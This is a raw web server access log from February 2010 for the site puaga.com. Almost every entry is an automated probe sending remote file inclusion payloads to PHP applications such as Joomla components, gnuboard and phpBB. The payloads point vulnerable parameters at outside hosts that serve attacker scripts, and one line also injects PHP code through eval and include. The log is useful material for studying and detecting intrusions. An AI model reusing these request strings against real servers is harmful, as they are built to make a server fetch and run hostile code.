74.205.120.218 - - [18/Feb/2010:07:27:47 -0800] "GET /logs/access_100127.log%20%20//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://study.de/editor/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [18/Feb/2010:07:27:54 -0800] "GET /logs/access_100107.log////components/com_RWCards/RWCards.php?msConfig.absolute.path=http://dongja.booktobi.com//attic/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [18/Feb/2010:07:27:55 -0800] "GET /logs/access_100121.log%20%20//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://study.de/editor/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [18/Feb/2010:07:28:01 -0800] "GET /logs/access_100209.log////components/com_RWCards/RWCards.php?msConfig.absolute.path=http://study.de/editor/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [18/Feb/2010:07:28:07 -0800] "GET /logs/access_100111.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [18/Feb/2010:07:28:23 -0800] "GET /logs/access_100127.log%20%20//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://study.de/editor/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [18/Feb/2010:07:28:23 -0800] "GET /logs//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://study.de/editor/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [18/Feb/2010:07:28:23 -0800] "GET /administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://study.de/editor/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [18/Feb/2010:07:28:28 -0800] "GET /logs/access_100121.log%20%20//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://study.de/editor/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [18/Feb/2010:07:28:51 -0800] "GET /logs/access_100111.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.243.44 - - [18/Feb/2010:07:29:27 -0800] "GET /logs/access_100103.log//skin/zero_vote/error.php?dir=http://sithome.com/technote6/data/board/news/id2.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
218.38.243.44 - - [18/Feb/2010:07:29:27 -0800] "GET /skin/zero_vote/error.php?dir=http://sithome.com/technote6/data/board/news/id2.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
218.38.243.44 - - [18/Feb/2010:07:29:31 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://sithome.com/technote6/data/board/news/id2.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
72.44.84.221 - - [18/Feb/2010:07:29:38 -0800] "GET /logs/access_100207.log//include/prodler.class.php?sPath=http://80.59.61.12/id.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.834" "www.puaga.com"
72.44.84.221 - - [18/Feb/2010:07:29:38 -0800] "GET /include/prodler.class.php?sPath=http://80.59.61.12/id.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.834" "www.puaga.com"
72.44.84.221 - - [18/Feb/2010:07:29:39 -0800] "GET /logs//include/prodler.class.php?sPath=http://80.59.61.12/id.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.834" "www.puaga.com"
72.44.84.221 - - [18/Feb/2010:07:29:44 -0800] "GET /logs/access_100119.log//include/prodler.class.php?sPath=http://80.59.61.12/id.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.834" "www.puaga.com"
72.44.84.221 - - [18/Feb/2010:07:30:13 -0800] "GET /logs/access_100119.log//include/prodler.class.php?sPath=http://80.59.61.12/id.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.834" "www.puaga.com"
72.44.84.221 - - [18/Feb/2010:07:30:13 -0800] "GET /include/prodler.class.php?sPath=http://80.59.61.12/id.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.834" "www.puaga.com"
72.44.84.221 - - [18/Feb/2010:07:30:14 -0800] "GET /logs//include/prodler.class.php?sPath=http://80.59.61.12/id.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.834" "www.puaga.com"
72.44.84.221 - - [18/Feb/2010:07:30:17 -0800] "GET /logs/access_100207.log//include/prodler.class.php?sPath=http://80.59.61.12/id.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.834" "www.puaga.com"
58.230.162.220 - - [18/Feb/2010:07:30:21 -0800] "GET /logs//bbs////delete_all.php?board_skin_path=http://www.maesil.co.kr/data/cok/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [18/Feb/2010:07:30:21 -0800] "GET /bbs////delete_all.php?board_skin_path=http://www.maesil.co.kr/data/cok/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [18/Feb/2010:07:30:21 -0800] "GET /logs/access_100203.log%20%20//bbs////delete_all.php?board_skin_path=http://www.maesil.co.kr/data/cok/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [18/Feb/2010:07:30:24 -0800] "GET /logs//bbs////delete_all.php?board_skin_path=http://www.maesil.co.kr/data/cok/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [18/Feb/2010:07:30:24 -0800] "GET /bbs////delete_all.php?board_skin_path=http://www.maesil.co.kr/data/cok/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [18/Feb/2010:07:30:24 -0800] "GET /logs/access_100203.log%20%20//bbs////delete_all.php?board_skin_path=http://www.maesil.co.kr/data/cok/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [18/Feb/2010:07:30:26 -0800] "GET /logs//bbs////delete_all.php?board_skin_path=http://www.maesil.co.kr/data/cok/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [18/Feb/2010:07:30:26 -0800] "GET /logs/access_100203.log%20%20//bbs////delete_all.php?board_skin_path=http://www.maesil.co.kr/data/cok/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [18/Feb/2010:07:30:26 -0800] "GET /bbs////delete_all.php?board_skin_path=http://www.maesil.co.kr/data/cok/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [18/Feb/2010:07:30:27 -0800] "GET /logs/access_100127.log//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://study.de/editor/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [18/Feb/2010:07:30:31 -0800] "GET /logs/access_100121.log//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://study.de/editor/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [18/Feb/2010:07:30:36 -0800] "GET /logs/access_100127.log//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://study.de/editor/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [18/Feb/2010:07:30:37 -0800] "GET /logs/access_100121.log//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://study.de/editor/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.98.144.18 - - [18/Feb/2010:07:31:15 -0800] "GET /logs//include/prodler.class.php?sPath=http://www.ktacademy.co.kr/flash/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.98.144.18 - - [18/Feb/2010:07:31:15 -0800] "GET /logs/access_100207.log%20%20//include/prodler.class.php?sPath=http://www.ktacademy.co.kr/flash/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.98.144.18 - - [18/Feb/2010:07:31:15 -0800] "GET /include/prodler.class.php?sPath=http://www.ktacademy.co.kr/flash/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.98.144.18 - - [18/Feb/2010:07:31:15 -0800] "GET /logs/access_100119.log%20%20//include/prodler.class.php?sPath=http://www.ktacademy.co.kr/flash/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [18/Feb/2010:07:31:19 -0800] "GET /logs///vwar/backup/errors.php?error=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [18/Feb/2010:07:31:19 -0800] "GET /logs/access_100107.log///vwar/backup/errors.php?error=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [18/Feb/2010:07:31:19 -0800] "GET //vwar/backup/errors.php?error=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.243.44 - - [18/Feb/2010:07:32:00 -0800] "GET /logs/access_100120.log%20//skin/zero_vote/error.php?dir=http://sithome.com/technote6/data/board/news/id2.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
89.36.175.10 - - [18/Feb/2010:07:32:02 -0800] "GET /write_update.php?board_skin_path=http://hajarmani.fileave.com/ld1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [18/Feb/2010:07:32:02 -0800] "GET /logs/access_100129.log//write_update.php?board_skin_path=http://hajarmani.fileave.com/ld1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [18/Feb/2010:07:32:02 -0800] "GET /logs//write_update.php?board_skin_path=http://hajarmani.fileave.com/ld1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [18/Feb/2010:07:32:03 -0800] "GET /write_update.php?board_skin_path=http://hajarmani.fileave.com/ld1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [18/Feb/2010:07:32:03 -0800] "GET /logs/access_100119.log//write_update.php?board_skin_path=http://hajarmani.fileave.com/ld1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [18/Feb/2010:07:32:03 -0800] "GET /logs/access_100204.log//write_update.php?board_skin_path=http://hajarmani.fileave.com/ld1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [18/Feb/2010:07:32:06 -0800] "GET /logs//write_update.php?board_skin_path=http://hajarmani.fileave.com/ld1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.44.84.221 - - [18/Feb/2010:07:32:10 -0800] "GET /logs/access_100119.log%20%20//include/prodler.class.php?sPath=http://80.59.61.12/fx29id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.44.84.221 - - [18/Feb/2010:07:32:10 -0800] "GET /logs//include/prodler.class.php?sPath=http://80.59.61.12/fx29id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.44.84.221 - - [18/Feb/2010:07:32:10 -0800] "GET /include/prodler.class.php?sPath=http://80.59.61.12/fx29id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [18/Feb/2010:07:32:27 -0800] "GET /logs/access_100126.log//write_update.php?board_skin_path=http://hajarmani.fileave.com/ld1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.44.84.221 - - [18/Feb/2010:07:32:27 -0800] "GET /logs/access_100123.log%20%20//include/prodler.class.php?sPath=http://80.59.61.12/fx29id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
38.101.148.126 - - [18/Feb/2010:07:32:30 -0800] "GET /robots.txt HTTP/1.1" 200 36 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "puaga.com"
38.101.148.126 - - [18/Feb/2010:07:32:30 -0800] "GET /orange_g/forum/viewtopic.php?p=25339 HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "puaga.com"
80.97.64.32 - - [18/Feb/2010:07:32:46 -0800] "GET /logs/access_100115.log%20%20//components/com_sef/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [18/Feb/2010:07:32:46 -0800] "GET /logs//components/com_sef/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [18/Feb/2010:07:32:46 -0800] "GET /components/com_sef/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [18/Feb/2010:07:33:03 -0800] "GET /logs/access_100209.log////components/com_RWCards/RWCards.php?msConfig.absolute.path=http://study.de/editor/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [18/Feb/2010:07:33:13 -0800] "GET /logs/access.log//write_update.php?board_skin_path=http://hajarmani.fileave.com/ld1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [18/Feb/2010:07:33:13 -0800] "GET /logs//write_update.php?board_skin_path=http://hajarmani.fileave.com/ld1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [18/Feb/2010:07:33:13 -0800] "GET /write_update.php?board_skin_path=http://hajarmani.fileave.com/ld1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [18/Feb/2010:07:33:54 -0800] "GET /logs//login.php?dir=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [18/Feb/2010:07:33:55 -0800] "GET /logs/access_100111.log//login.php?dir=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [18/Feb/2010:07:33:55 -0800] "GET /login.php?dir=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [18/Feb/2010:07:33:55 -0800] "GET /logs/access_100206.log//login.php?dir=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [18/Feb/2010:07:33:55 -0800] "GET /bbs/write_update.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [18/Feb/2010:07:33:55 -0800] "GET /logs/access_100205.log//bbs/write_update.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [18/Feb/2010:07:33:55 -0800] "GET /logs//bbs/write_update.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.13.139.254 - - [18/Feb/2010:07:35:17 -0800] "GET /logs//index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.13.139.254 - - [18/Feb/2010:07:35:17 -0800] "GET /logs/access_100117.log%20%20//index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.13.139.254 - - [18/Feb/2010:07:35:17 -0800] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.uri.edu/uri/satu?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.153 - - [18/Feb/2010:07:35:34 -0800] "GET /logs//write_update.php?board_skin_path=http://hajarmani.fileave.com/ld1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.153 - - [18/Feb/2010:07:35:34 -0800] "GET /write_update.php?board_skin_path=http://hajarmani.fileave.com/ld1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.153 - - [18/Feb/2010:07:35:35 -0800] "GET /logs/access_100129.log//write_update.php?board_skin_path=http://hajarmani.fileave.com/ld1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [18/Feb/2010:07:36:30 -0800] "GET /logs/access_100201.log%20%20//bbs/write_update.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [18/Feb/2010:07:36:31 -0800] "GET /logs//bbs/write_update.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [18/Feb/2010:07:36:31 -0800] "GET /bbs/write_update.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.243.44 - - [18/Feb/2010:07:37:00 -0800] "GET /logs//bbs////delete_all.php?board_skin_path=http://www.maesil.co.kr/data/cok/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.243.44 - - [18/Feb/2010:07:37:00 -0800] "GET /logs/access_100203.log%20%20//bbs////delete_all.php?board_skin_path=http://www.maesil.co.kr/data/cok/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.243.44 - - [18/Feb/2010:07:37:00 -0800] "GET /logs/access_100206.log%20%20//bbs////delete_all.php?board_skin_path=http://www.maesil.co.kr/data/cok/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.243.44 - - [18/Feb/2010:07:37:00 -0800] "GET /bbs////delete_all.php?board_skin_path=http://www.maesil.co.kr/data/cok/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.243.44 - - [18/Feb/2010:07:37:06 -0800] "GET /bbs////delete_all.php?board_skin_path=http://www.maesil.co.kr/data/cok/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.243.44 - - [18/Feb/2010:07:37:06 -0800] "GET /logs/access_100206.log%20%20//bbs////delete_all.php?board_skin_path=http://www.maesil.co.kr/data/cok/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.243.44 - - [18/Feb/2010:07:37:06 -0800] "GET /logs//bbs////delete_all.php?board_skin_path=http://www.maesil.co.kr/data/cok/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.243.44 - - [18/Feb/2010:07:37:07 -0800] "GET /logs/access_100203.log%20%20//bbs////delete_all.php?board_skin_path=http://www.maesil.co.kr/data/cok/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.44.84.221 - - [18/Feb/2010:07:37:13 -0800] "GET /include/prodler.class.php?sPath=http://80.59.61.12/fx29id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.44.84.221 - - [18/Feb/2010:07:37:21 -0800] "GET /logs//include/prodler.class.php?sPath=http://80.59.61.12/fx29id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.44.84.221 - - [18/Feb/2010:07:37:21 -0800] "GET /logs/access_100119.log//include/prodler.class.php?sPath=http://80.59.61.12/fx29id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.44.84.221 - - [18/Feb/2010:07:37:21 -0800] "GET /logs/access_100123.log//include/prodler.class.php?sPath=http://80.59.61.12/fx29id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.98.144.18 - - [18/Feb/2010:07:37:41 -0800] "GET /logs/access_100119.log//include/prodler.class.php?sPath=http://www.ktacademy.co.kr/flash/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.98.144.18 - - [18/Feb/2010:07:37:41 -0800] "GET /logs//include/prodler.class.php?sPath=http://www.ktacademy.co.kr/flash/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.98.144.18 - - [18/Feb/2010:07:37:41 -0800] "GET /include/prodler.class.php?sPath=http://www.ktacademy.co.kr/flash/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.98.144.18 - - [18/Feb/2010:07:37:41 -0800] "GET /logs/access_100123.log//include/prodler.class.php?sPath=http://www.ktacademy.co.kr/flash/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [18/Feb/2010:07:37:43 -0800] "GET /logs/access_100205.log%20%20//bbs/write_update.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [18/Feb/2010:07:37:49 -0800] "GET //vwar/backup/errors.php?error=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [18/Feb/2010:07:37:49 -0800] "GET /logs///vwar/backup/errors.php?error=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [18/Feb/2010:07:37:49 -0800] "GET /logs/access_100107.log%20%20///vwar/backup/errors.php?error=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [18/Feb/2010:07:37:53 -0800] "GET /logs//write_update.php?board_skin_path=http://hajarmani.fileave.com/ld1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [18/Feb/2010:07:37:53 -0800] "GET /logs/access_100210.log//write_update.php?board_skin_path=http://hajarmani.fileave.com/ld1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [18/Feb/2010:07:37:53 -0800] "GET /write_update.php?board_skin_path=http://hajarmani.fileave.com/ld1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [18/Feb/2010:07:37:53 -0800] "GET /logs/access.log//write_update.php?board_skin_path=http://hajarmani.fileave.com/ld1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [18/Feb/2010:07:38:06 -0800] "GET /write_update.php?board_skin_path=http://hajarmani.fileave.com/ld1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [18/Feb/2010:07:38:06 -0800] "GET /logs/access_100119.log%20%20//write_update.php?board_skin_path=http://hajarmani.fileave.com/ld1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [18/Feb/2010:07:38:06 -0800] "GET /logs//write_update.php?board_skin_path=http://hajarmani.fileave.com/ld1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [18/Feb/2010:07:38:36 -0800] "GET /logs/access_100204.log%20%20//write_update.php?board_skin_path=http://hajarmani.fileave.com/ld1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.195.114.36 - - [18/Feb/2010:07:38:39 -0800] "GET /blog/ HTTP/1.0" 404 5258 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "puaga.com"
67.195.114.36 - - [18/Feb/2010:07:38:40 -0800] "GET /style/polstandard.css HTTP/1.0" 200 5623 "http://puaga.com/blog/" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "puaga.com"
67.195.114.36 - - [18/Feb/2010:07:38:40 -0800] "GET /style/pngHack.css HTTP/1.0" 200 42 "http://puaga.com/blog/" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "puaga.com"
173.212.202.130 - - [18/Feb/2010:07:38:50 -0800] "GET /logs/access_100123.log%20%20//?path%5Bdocroot%5D=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.40.122.117 - - [18/Feb/2010:07:38:58 -0800] "GET /logs/access_100121.log//bbs/write_update.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [18/Feb/2010:07:39:54 -0800] "GET /logs//write_update.php?board_skin_path=http://hajarmani.fileave.com/ld1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [18/Feb/2010:07:39:54 -0800] "GET /write_update.php?board_skin_path=http://hajarmani.fileave.com/ld1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [18/Feb/2010:07:39:54 -0800] "GET /logs/access_100119.log//write_update.php?board_skin_path=http://hajarmani.fileave.com/ld1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.63.235.157 - - [18/Feb/2010:07:40:24 -0800] "GET /logs/access_100204.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://ufaeda.ru//poll/id.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.63.235.157 - - [18/Feb/2010:07:40:24 -0800] "GET /logs//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://ufaeda.ru//poll/id.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.63.235.157 - - [18/Feb/2010:07:40:25 -0800] "GET /index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://ufaeda.ru//poll/id.txt? HTTP/1.0" 200 3626 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [18/Feb/2010:07:40:28 -0800] "GET /logs/access_100204.log//write_update.php?board_skin_path=http://hajarmani.fileave.com/ld1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.63.235.157 - - [18/Feb/2010:07:40:44 -0800] "GET /logs/access_100117.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://ufaeda.ru//poll/id.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.13.139.254 - - [18/Feb/2010:07:41:31 -0800] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
